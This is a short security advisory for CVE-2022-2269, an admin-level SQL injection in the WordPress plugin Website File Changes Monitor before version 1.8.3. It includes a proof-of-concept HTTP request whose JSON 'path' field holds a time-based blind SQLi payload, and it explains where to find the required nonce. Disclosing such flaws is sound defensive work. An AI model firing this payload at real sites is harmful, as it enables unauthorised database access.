Website File Changes Monitor < 1.8.3 – Admin+ SQLi | CVE 2022-2269

Description

The plugin does not sanitise and escape user input before using it in a SQL statement via an action available to users with the manage_options capability (by default admins), leading to an SQL injection

Proof of Concept

A user with manage_options permission can exploit the vulnerability with the following request :

DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1
Host: 127.0.0.1
X-WP-Nonce: 5732d8605b
Cookie: [redacted]
Content-Type: application/json
Content-Length: 54

{"path":"a'-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'"}


The nonce required for the header "X-WP-Nonce" can be found in the source code of the page /wp-admin/admin.php?page=wfcm-file-changes, at the following line :
var wfcmData = {"restNonce":"5732d8605b","restAdminEndpoint":"http:\/\/127.0.0.1\/wp-json\/website-file-changes-monitor\/v1\/admin-notices","adminAjax":"http:\/\/127.0.0.1\/wp-admin\/admin-ajax.php"};